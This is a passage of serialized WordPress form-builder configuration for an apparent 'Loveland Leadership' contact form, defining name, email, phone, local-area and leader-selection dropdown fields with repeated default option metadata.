Communications</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:193:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Communications</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_44\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_44\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:166;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_45\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_45\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:167;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_46\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:11:\"lastname_46\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:168;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_47\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_47\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:169;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_48\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_48\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:170;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_49\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_49\";}s:2:\"id\";i:171;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:5:\"hr_50\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:5:\"hr_50\";}s:2:\"id\";i:172;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:29:\"Loveland Leadership Positions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Positions</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Positions</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_51\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:29:\"Loveland Leadership Positions\";s:9:\"field_key\";s:7:\"html_51\";}s:2:\"id\";i:173;}i:8;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:41:\"Select the person you would like to email\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:6:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 